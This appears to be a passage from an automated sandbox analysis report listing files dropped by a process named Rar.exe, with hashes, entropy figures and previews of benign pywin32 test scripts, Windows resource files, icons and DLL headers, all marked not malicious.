                                                                                                                                                                                                                                  Entropy (8bit):4.535765323916297
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:NyRFLXvLSYpwtstqrzQpFVb2WkEYoKXFfMLkppb2rkUAjpAC7Mv:NKFLXvO4TbTYtXJba2pV7u
                                                                                                                                                                                                                                  MD5:F78744E1A96E4C1F0F8A9B06C76BBD5F
                                                                                                                                                                                                                                  SHA1:67A8E82CADDB11F2E0CF590BEEC3BE0CFA5A3575
                                                                                                                                                                                                                                  SHA-256:D67BBF211BAFC8305BFC7E223DC56A88464E1BE5B65DB427745BBF8BC181D241
                                                                                                                                                                                                                                  SHA-512:01BA7F2D063E1C7F7FA480969BF7B16F67A851C09310A75A69ED7D5FD2B740D3143D2B766023515FCECC40C8203DA3EA2022D91BCEC9957527A3AD09D1410EF2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Test win32profile""".import os.import unittest..import win32profile...class Tester(unittest.TestCase):. def test_environment(self):. os.environ["FOO"] = "bar=baz". env = win32profile.GetEnvironmentStrings(). assert "FOO" in env. assert env["FOO"] == "bar=baz". assert os.environ["FOO"] == "bar=baz"...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2462
                                                                                                                                                                                                                                  Entropy (8bit):4.693224762679464
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:VYqchbQKoP586t8qj4sYRqZrqvOlH7gfS:VYqchYzt8gAqsOlH7gq
                                                                                                                                                                                                                                  MD5:FE721D7BDD29E9998EEB3208CDB4A95D
                                                                                                                                                                                                                                  SHA1:8DF8FD70E75CE58F5BCD5F89967DEECE0D5A8C93
                                                                                                                                                                                                                                  SHA-256:F677D0C135FF762FE60F9C1C52332ED6C04A776CB20E5C3C4FF0B0F05523D008
                                                                                                                                                                                                                                  SHA-512:6C1E3395039EAF8F6F2F4A2663352EBB8CAC534F8495DAA9B11CA158F1F2F2E6316BBB8362D177E6387AE7A320C914F7F33A1A9DCFD6307C0C0FADE2C7E7B8AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import tempfile.import unittest..import win32con.import win32rcparser...class TestParser(unittest.TestCase):. def setUp(self):. rc_file = os.path.join(os.path.dirname(__file__), "win32rcparser", "test.rc"). self.resources = win32rcparser.Parse(rc_file).. def testStrings(self):. for sid, expected in (. ("IDS_TEST_STRING4", "Test 'single quoted' string"),. ("IDS_TEST_STRING1", 'Test "quoted" string'),. ("IDS_TEST_STRING3", 'String with single " quote'),. ("IDS_TEST_STRING2", "Test string"),. ):. got = self.resources.stringTable[sid].value. self.assertEqual(got, expected).. def testStandardIds(self):. for idc in "IDOK IDCANCEL".split():. correct = getattr(win32con, idc). self.assertEqual(self.resources.names[correct], idc). self.assertEqual(self.resources.ids[idc], correct).. def testTabStop(self):. d = self.resources.dialogs["I
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):774
                                                                                                                                                                                                                                  Entropy (8bit):4.544684110688971
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:l8TebQz+CK8iFa3vNnYtRz+tjyHkTn5pVS:l8qbQz+C1iFa/Nnsz+tj3FfS
                                                                                                                                                                                                                                  MD5:EB93616B87101E3636F95B9C99B8DB33
                                                                                                                                                                                                                                  SHA1:E1D393944DFB58A518DA53BC3F379E4116A396C4
                                                                                                                                                                                                                                  SHA-256:2C13496CCD350A1A6059ED8BACE5D943DE9C70201D1257FEE0687BAFE524F9A7
                                                                                                                                                                                                                                  SHA-512:76ED693E65AAC9BC4F6AE27C476F31EAEF498A3EBEC9FB5DAF1CA41B770D95B3A15BD88438CF2DCB02680C271E26EF77A805787BEBBC77331D269ECFA31D4287
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test module for win32timezone..import doctest.import sys.import unittest..import win32timezone...class Win32TimeZoneTest(unittest.TestCase):. def testWin32TZ(self):. # On 3.7 and later, the repr() for datetime objects changed to use kwargs - eg,. # eg, `datetime.timedelta(0, 10800)` is now `datetime.timedelta(seconds=10800)`.. # So we just skip the tests on 3.5 and 3.6. if sys.version_info < (3, 7):. from pywin32_testutil import TestSkipped.. raise TestSkipped(. "The repr() for datetime objects makes this test fail in 3.5 and 3.6". ).. failed, total = doctest.testmod(win32timezone, verbose=False). self.assertFalse(failed)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11415
                                                                                                                                                                                                                                  Entropy (8bit):4.51306928669101
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ZZjEDkF9M6VZwHSvCUsXsEboxhWm7mUksYgms47sQ8C9ZRB3UZbU83ViNuDRJZBg:ZWASEQSc6xcm7mUkx3ZXWU8oCNcCs
                                                                                                                                                                                                                                  MD5:D31B968890F11B8E808CB0A707353CB2
                                                                                                                                                                                                                                  SHA1:1C77EFD68D15B9E0D5D3031FE9C2BAD4087EDFEE
                                                                                                                                                                                                                                  SHA-256:CDDD29A1351F771EB9048BC4CFEBE24D7DAFDF9B80BE451E8B5B39D5602ED835
                                                                                                                                                                                                                                  SHA-512:52E99B1AEA9BB427DA3D64DA50BCF6FADCCAE5A1735066A65E1BA750A369E52AEFCFB75108FE4936DB02762B8F6A2AB5850C8362317620FC3363E94E8B0BA7E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import sys.import threading.import time.import unittest..import win32trace.from pywin32_testutil import TestSkipped..if __name__ == "__main__":. this_file = sys.argv[0].else:. this_file = __file__...def SkipIfCI():. # This test often fails in CI, probably when it is being run multiple times. # (ie, for different Python versions). # Github actions always have a `CI` variable.. if "CI" in os.environ:. raise TestSkipped("We skip this test on CI")...def CheckNoOtherReaders():. win32trace.write("Hi"). time.sleep(0.05). if win32trace.read() != "Hi":. # Reset everything so following tests still fail with this error!. win32trace.TermRead(). win32trace.TermWrite(). raise RuntimeError(. "An existing win32trace reader appears to be ". "running - please stop this process and try again". )...class TestInitOps(unittest.TestCase):. def setUp(self):. SkipIfCI(). # clear old data.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5810
                                                                                                                                                                                                                                  Entropy (8bit):4.711734132606811
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:LCkYbvWtakMDqPaR7v/RqtdfllFpK6tVlHCXEZyqLQ4wmILiW6gG06MTKNOq:9akMDqP27xqtdv9AUZHLQ479DMTNq
                                                                                                                                                                                                                                  MD5:5EA7551E921DA9DDEF12BEE243E4494B
                                                                                                                                                                                                                                  SHA1:F63F0CB65B4F881EAFFBE06A4C396A395F21E433
                                                                                                                                                                                                                                  SHA-256:A5D600D8C295CC07823DB4FBB1AAA9ADACF7627F59EF71E1EE9285BAA9E76CFC
                                                                                                                                                                                                                                  SHA-512:72675633C3E2BA2E48886912CF5FE719040E2D5341F570DF627F503FD0CA9497D0C3B8DBCB842EB43242F97A41AB9EF46E527034917666AAB301CB4B0219CD9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import netbios.import win32api.import win32wnet.from pywin32_testutil import str2bytes..RESOURCE_CONNECTED = 0x00000001.RESOURCE_GLOBALNET = 0x00000002.RESOURCE_REMEMBERED = 0x00000003.RESOURCE_RECENT = 0x00000004.RESOURCE_CONTEXT = 0x00000005.RESOURCETYPE_ANY = 0x00000000.RESOURCETYPE_DISK = 0x00000001.RESOURCETYPE_PRINT = 0x00000002.RESOURCETYPE_RESERVED = 0x00000008.RESOURCETYPE_UNKNOWN = 0xFFFFFFFF.RESOURCEUSAGE_CONNECTABLE = 0x00000001.RESOURCEUSAGE_CONTAINER = 0x00000002.RESOURCEDISPLAYTYPE_GENERIC = 0x00000000.RESOURCEDISPLAYTYPE_DOMAIN = 0x00000001.RESOURCEDISPLAYTYPE_SERVER = 0x00000002.RESOURCEDISPLAYTYPE_SHARE = 0x00000003...NETRESOURCE_attributes = [. ("dwScope", int),. ("dwType", int),. ("dwDisplayType", int),. ("dwUsage", int),. ("lpLocalName", str),. ("lpRemoteName", str),. ("lpComment", str),. ("lpProvider", str),.]..NCB_attributes = [. ("Command", int),. ("Retcode", int),. ("Lsn", int),. ("Num", int),. # ("Buff
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7254
                                                                                                                                                                                                                                  Entropy (8bit):4.324657504637411
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dL2D8uzIaoa80XFiHTPusLCsRg9LOwS2wsff2yIdEJBwys3u7HQ9jUNw8kKzTxsz:dGIRBeeT2OuEgfiGRoFQ9sC6
                                                                                                                                                                                                                                  MD5:7F09D3E18F73FEBB6A4CC0EF60200C1D
                                                                                                                                                                                                                                  SHA1:89B5B096A4FA43486597D5221DEA90E4B4C5F519
                                                                                                                                                                                                                                  SHA-256:DDFACE034C91EF063814F00BE94B76B846E9977088B7DA7FB7EC62A2CBE1EA7C
                                                                                                                                                                                                                                  SHA-512:ECAF5E1BBB6A4D9785778F5CF31AE91DFA80FE937636F16889D1B8CC87BE82D8FE48868FE0E410B5B8CD35772BB6B9E1F66474A122FC302E562D4B09C9C45B18
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import re.import sys.import traceback.import unittest..import pywin32_testutil..# A list of demos that depend on user-interface of *any* kind. Tests listed.# here are not suitable for unattended testing..ui_demos = """GetSaveFileName print_desktop win32cred_demo win32gui_demo. win32gui_dialog win32gui_menu win32gui_taskbar. win32rcparser_demo winprocess win32console_demo. win32clipboard_bitmapdemo. win32gui_devicenotify. NetValidatePasswordPolicy""".split().# Other demos known as 'bad' (or at least highly unlikely to work).# cerapi: no CE module is built (CE via pywin32 appears dead).# desktopmanager: hangs (well, hangs for 60secs or so...).# EvtSubscribe_*: must be run together:.# SystemParametersInfo: a couple of the params cause markh to hang, and there's.# no great reason to adjust (twice!) all those system settings!.bad_demos = """cerapi desktopmanager win32comport_demo. EvtSubscribe_pull Evt
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 33 x 33 x 4, image size 660, cbSize 778, bits offset 118
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):778
                                                                                                                                                                                                                                  Entropy (8bit):3.1275984527229412
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:4giJF9YnuKLG1jRsOuhsuyR5ejFKzRvqasurl99OOyHrLn:4bK61VMxFalw
                                                                                                                                                                                                                                  MD5:527ACF2CA463153A889C0D30366EFAC1
                                                                                                                                                                                                                                  SHA1:9A2FF9C2B217CB1A8541B6B44AB92080E4EA0935
                                                                                                                                                                                                                                  SHA-256:19623132815DADA9EA5C7C4883227F768BC904D7C2C5CFCE4259D21B14DF1CB1
                                                                                                                                                                                                                                  SHA-512:FA6D0B602628F5752BF5A9B58E0BA234B904DC571970FB426EEBE40072B9581A5BCAC3878B50C5DDA171B7637F87429CD94A6F7209ECBE029426781D46E2458E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:BM........v...(...!...!.............................................................................................................................................................3...................33.333...........33333330..........3:3333333333........330333.3330.........333.30.30.0........3.330......0..........333................3.330................33.................:330............:.....33.............:...:33..............:..30............:.3.30..............:...30...............:.330.........333.....330..........033....33..........33333...33..........333333:.30...........33333030..............0.30..............................................................................................3.................030.................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):766
                                                                                                                                                                                                                                  Entropy (8bit):2.9744570511075614
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:IEipKm6kpU3/tRz//lFWIzldyMQSCrDs+/Co08daaeP:IEiQm6kkRDtFrdyMJCrDs+/CAIP
                                                                                                                                                                                                                                  MD5:FC2A98F8A8428A9A6D5579C79A94FBD8
                                                                                                                                                                                                                                  SHA1:5A43595D92FF2E5AB3EFA2DF1A0643A27C09CD1F
                                                                                                                                                                                                                                  SHA-256:2E7402ED1683A751BB5222A0379E5D8A50E3467E35C0D0D35B2A3CCA645372DC
                                                                                                                                                                                                                                  SHA-512:FE9ECD2B045670D16AB305E5F6EE943D99B4DA320BE5D23CF5BE9A0FD35ED17A58C7479B23D27FBFA64A8DDE3DF2911FD1738CE46C772E6F55D4072C8CFCCC88
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...... ..............(... ...@...................................................................................................................................3.................33.333.........33333330......3:3333333333......330333.3330.....333.30.30.0....3.330......0......333............3.330..............33.............:330........:.....33.........:...:33..........:....30..........:.3.30..........:...30...........:.330.....333.....330......033....33......33333...33......333333:.30.......33333030..........0.30..............................................................................3.............030........................................g........................_........0...........................................................................G..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1169
                                                                                                                                                                                                                                  Entropy (8bit):5.066451700026354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:mfAR2Xzlz9lh8IkXz/f7Yg3Fl9Kynarx48pfLtcmc2IcfDcb/:4HdV8I6T3/0ynadZM/
                                                                                                                                                                                                                                  MD5:60B583798EAE6B6F72A6278FAFF13250
                                                                                                                                                                                                                                  SHA1:F08720EDD570520DBF88BD241182D59994314045
                                                                                                                                                                                                                                  SHA-256:CE7A510695120F2EBB6BBEAC0C7B8FD2E4C0258BF4F637E392BD5E85FFF08BC2
                                                                                                                                                                                                                                  SHA-512:30F982EF35CAED22DF7DE381D3FD7B6EE50F0144337EA9AE2572928155C6EC4B98A840D99C8653F1E8EFE60BE14645CA35B9E7FDFA9CBA044589117ACA70F3DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview://{{NO_DEPENDENCIES}}.// Microsoft Developer Studio generated include file..// Used by test.rc.//.#define IDS_TEST_STRING1 51.#define IDS_TEST_STRING2 52.#define IDS_TEST_STRING3 53.#define IDS_TEST_STRING4 54.#define IDS_TEST_STRING5 55.#define IDS_TEST_STRING6 56.#define IDS_TEST_STRING7 57.#define IDD_TEST_DIALOG1 101.#define IDD_TEST_DIALOG2 102.#define IDB_PYTHON 103.#define IDI_PYTHON 105.#define IDD_TEST_DIALOG3 105.#define IDC_EDIT1 1000.#define IDC_CHECK1 1001.#define IDC_EDIT2 1001.#define IDC_COMBO1 1002.#define IDC_SPIN1 1003.#define IDC_PROGRESS1 1004.#define IDC_SLIDER1 1005.#define IDC_LIST1 1006.#define IDC_TREE1 1007.#define IDC_TAB1 1008.#define IDC_ANIMATE1 1009.#define IDC_RICHEDIT1 1010.#define IDC_DATETIMEPICKER1 1011.#define IDC_MONTHCALENDAR1 1012.#define IDC_SCROLLBAR1 1013.#define IDC_SCROLLBAR2 1014.#define IDC_LIST2 1015.#define IDC_HELLO 1016.#define IDC_HELLO2 1017..// Next default values for new objects.//.#ifdef APSTUDIO_INVOKED.#ifndef APSTUDIO_READONLY
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6273
                                                                                                                                                                                                                                  Entropy (8bit):4.814338859710688
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:9IvbeVpdPK9POPlrjywqjiHwy/JrjxIF0mqnWldrheQ9nn5e:MbeVpdi9mPlSwqaJrjxi0mqnWPhX5e
                                                                                                                                                                                                                                  MD5:2C3DD64292595BF0C580F3EA135EEC18
                                                                                                                                                                                                                                  SHA1:29526198EEA82C60D9C40D3CD389C2BBBEF16FA0
                                                                                                                                                                                                                                  SHA-256:8BA44D67D9F96EE91975990BAA518DB303E6EE90AFABBED6953F4B21268CE01B
                                                                                                                                                                                                                                  SHA-512:A952FFF91B2DFECAA51EAFC7D08F47404E0C80D5F12896644E1E83BCE0B84C02BD6A2BCBF3F83D3EBC413484BCF82A5CADEFA90AAD938421CA85CBA9ED356BBE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview://Microsoft Developer Studio generated resource script..//.#include "test.h"..#define APSTUDIO_READONLY_SYMBOLS./////////////////////////////////////////////////////////////////////////////.//.// Generated from the TEXTINCLUDE 2 resource..//.#include "afxres.h"../////////////////////////////////////////////////////////////////////////////.#undef APSTUDIO_READONLY_SYMBOLS../////////////////////////////////////////////////////////////////////////////.// English (Australia) resources..#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENA).#ifdef _WIN32.LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_AUS.#pragma code_page(1252).#endif //_WIN32..#ifdef APSTUDIO_INVOKED./////////////////////////////////////////////////////////////////////////////.//.// TEXTINCLUDE.//..1 TEXTINCLUDE DISCARDABLE .BEGIN. "test.h\0".END..2 TEXTINCLUDE DISCARDABLE .BEGIN. "#include ""afxres.h""\r\n". "\0".END..3 TEXTINCLUDE DISCARDABLE .BEGIN. "\r\n". "\0".END..#endif // APSTUDIO_INVOKED.../////////////
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                  Entropy (8bit):5.716617252323436
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JhsSwN9L2hrRBJSwrzQVkzwBal2kcDjbwJjOtiGDqtoimF/lJkdumITzaJvGlkwv:JB2pCakzRlB+jbYj6iGDq1mFIdnjOlk
                                                                                                                                                                                                                                  MD5:B5A90C757460AAF2280B9DB020274F15
                                                                                                                                                                                                                                  SHA1:35D6999E10C8EE6ECD88940AE39BD89C6FD3C97E
                                                                                                                                                                                                                                  SHA-256:070FEC28E4150AFFDF69CBC3042FDDDBCC79E95AF33D613DB0D6E4BF3DEBEC90
                                                                                                                                                                                                                                  SHA-512:DE4B16E440C10556BE4B3F696E81626E11B68374385B9E4CDDE4DE0CAE6F10F70D36585807CD1D7B862C3C6E1306B5DED40654879C1584E9430DBC057B26D5B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{...{...{......{...z...{...~...{.......{...x...{.,.z...{.J.z...{...z...{...z...{.,.r...{.,.{...{.,.y...{.Rich..{.........................PE..L......d...........!.........................0...............................p............@..........................7..L....7.......P..L....................`.......2..T............................3..@............0...............................text............................... ..`.rdata..~....0......................@..@.data........@.......,..............@....rsrc...L....P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103424
                                                                                                                                                                                                                                  Entropy (8bit):6.3909294717445375
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:xBzJ+cRa1YmNAC06yHiG0fVhVFhLqN6/2yymx+dCanfO8eFgqT2JE:xBzJ+cZYVhVl/2yAdCa2Lv2E
                                                                                                                                                                                                                                  MD5:EE407DCEA96D260B9DF5AED85408FE8D
                                                                                                                                                                                                                                  SHA1:600A8CCC28069ABF6920536EE9D2DBBAB449EF5B
                                                                                                                                                                                                                                  SHA-256:91FA48528506D909C2E40103813789738915FF1318EF20118DC19D17AD017955
                                                                                                                                                                                                                                  SHA-512:45EACC91681556AC0DB64B071B600AF84F9CFDB65771529601095B6C1B69EF4B06632298F4B464EA1DF5AFD1DAD91E94977C28C9A752283D6C9A1F224EB3B9E3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................`.....................l.........................l......l....l....Rich...........................PE..L......d...........!......................................................................@..........................C......TD..........\........................ ...:..T...............................@...............p...\C..@....................text...{........................... ..`.rdata..`k.......l..................@..@.data........p.......\..............@....rsrc...\............n..............@..@.reloc... ......."...r..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                                                  Entropy (8bit):6.058338660371219
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:V7rLbe3Gp2GoXgR551OVpHV4rjjiqURJ0nl5Bzp1dn/g+yE+vpLF7:Vfb3D751OVpHV4uRmR9/g+ytpLh
                                                                                                                                                                                                                                  MD5:026FD8B8A64FAEF005332FDB04768C75
                                                                                                                                                                                                                                  SHA1:EE484A9A76D5F9AF7F2C9D0E298C5AFA58FB1C0C
                                                                                                                                                                                                                                  SHA-256:1D62BF814660CD5E45C9E0A3FB87C99CABCA20BA75C36C4E8B5A8C65FDA4565E
                                                                                                                                                                                                                                  SHA-512:485B16D1BFB2B026BBBCE1EABA53EDD8EC4AC282E9E3A1B4AB13F1A2CBCF2CB2A342BCD7A300B9BF1414CFEBE22772CBA5BD676C7E82A3BFAA5EA6DDD1C16634
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............................................x.......................................Rich...................PE..L......d...........!.....(...(......R'.......@............................................@.........................0N..\....N.......p..t............................I..T...........................XI..@............@...............................text...3'.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......H..............@....rsrc...t....p.......J..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):48128
                                                                                                                                                                                                                                  Entropy (8bit):6.224682276228643
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:DaSJeGiTydNIBDnAy9tSm8zzlihbDu2k9G79nmVoUG1q0gN/Dsm:DaSouIDAy3+zlAwVoUG1q0gN/Dh
                                                                                                                                                                                                                                  MD5:96C2E89F35B72A39A7FF9EB1F12B0C28
                                                                                                                                                                                                                                  SHA1:8B325403956BFC0B06A17D805B86E3E6196D9276
                                                                                                                                                                                                                                  SHA-256:9667B61CFC8155843CE13B12BD308EB7D271F2840441EBB1712FC11A9C88005A
                                                                                                                                                                                                                                  SHA-512:E5A3644D2D1B65FE396D2EDA70CBE86539D5099EC1C708D5F293708236A66E939290D72C7C1AF5D152846D932FE5ABEE3D7F935B3D00F62A02F86EEB64EA0728
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(.P(.P(.P!.3P..Pz..Q*.Pz..Q8.Pz..Q".Pz..Q).P.Q*.P...Q*.P<..Q+.P(.P..P.Q).P.Q).P.Q).PRich(.P................PE..L......d...........!.....V...b.......Q.......p............................................@.........................`...X...............l...........................|...T..............................@............p..,............................text...qT.......V.................. ..`.rdata...B...p...D...Z..............@..@.data...............................@....rsrc...l...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30208
                                                                                                                                                                                                                                  Entropy (8bit):6.12826822648431
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:4t/yZ7KPObCP6EC5ZN4qel/yp2eR1WDk3MuCVK:W6ZGPOc6EmNreBeR1WDk3MuCVK
                                                                                                                                                                                                                                  MD5:75D072824426AC103DBED6C7F794AC84
                                                                                                                                                                                                                                  SHA1:1217F4826C2379A6FA25D738AE24087BE94DFD16
                                                                                                                                                                                                                                  SHA-256:4F25FDD82B2E0631CA08C03911FB07DF35B044BABA38A7A1790B1E9FE0DAC20C
                                                                                                                                                                                                                                  SHA-512:F9679201390C4B4840BF1268FB39C5723DE15A433CE2267FDC0E0CE40BC4A2114F032B7127C7F272148183A428FE62A4DF609CB3DCD79AF4659DD1299F891A26
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,......................~......~......~......~....H.~.......~.......~...........H.~....H.~....H.~....Rich............PE..L......d...........!.....<...6......E:.......P............................................@.........................ph..T....h..........\.......................(....b..T...........................Hc..@............P...............................text...+:.......<.................. ..`.rdata...$...P...&...@..............@..@.data...`............f..............@....rsrc...\............j..............@..@.reloc..(............n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103424
                                                                                                                                                                                                                                  Entropy (8bit):6.473068406190836
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:1Vr5D5aHAa/RCI1lHC836SPWxeTcSxk83rR4u2fUqsYWsqydaZDOJPeQyWJa68yY:Fa/RCI1lHC834Ihr2JNvEZDcWQyWfY
                                                                                                                                                                                                                                  MD5:09447DBDABCF0CC1DF2F18BC914C52C6
                                                                                                                                                                                                                                  SHA1:4016C3C01F11BF7084FF0B9D1F83223CAAE163D0
                                                                                                                                                                                                                                  SHA-256:DE873B0FB18DC50255295E422F29145343F600FF778DC12B3FCEC7B9B6739CF9
                                                                                                                                                                                                                                  SHA-512:293150C3D6E3389D03DAAA03DFAB9AC58D458C85005EC561ABFFBE5C0CBB4AD5C26E7105331BA291C4F8D25F74C58615A3D33B6481B50918581E2C7E823279B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0C..t"m.t"m.t"m.}Z..p"m.&Wl.v"m.&Wh.d"m.&Wi.~"m.&Wn.u"m..Wl.v"m..Kl.v"m.`Il.s"m.t"l.."m..Wd.}"m..Wm.u"m..Wo.u"m.Richt"m.........PE..L......d...........!................*.....................................................@.........................0>......4Z..........d.......................x..../..T............................/..@...............t............................text............................... ..`.rdata...s.......t..................@..@.data...T............\..............@....rsrc...d............p..............@..@.reloc..x........ ...t..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22528
                                                                                                                                                                                                                                  Entropy (8bit):6.028742764868691
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:xQsQ0QgQNYqa0ajYva5dM4ALhDbXAjqcQ/Th/Gddbcg8JFBc5Zp4hp0DQMdCoFzz:x1dRelarca5dMhfbp/Th/Gddbc7jBGpf
                                                                                                                                                                                                                                  MD5:41EA4E00EC740873C492D3F5EDA05FD3
                                                                                                                                                                                                                                  SHA1:DB82D7629A720409B02BD342B1087F0C5313F4DF
                                                                                                                                                                                                                                  SHA-256:A081CB434C393C73A02BE1FC29E35E7C1042EF357CEBD583B506C468BA700C85
                                                                                                                                                                                                                                  SHA-512:D55FC13C52F8C69CAC5A266B84D792D8E74B612E1929A6322D2498FB366BFD35331F5B06F4F55204545283698D59883249BED45BF12C208511B9549FEA185B55
                                                                                                                                                                                                                                  Malicious:false
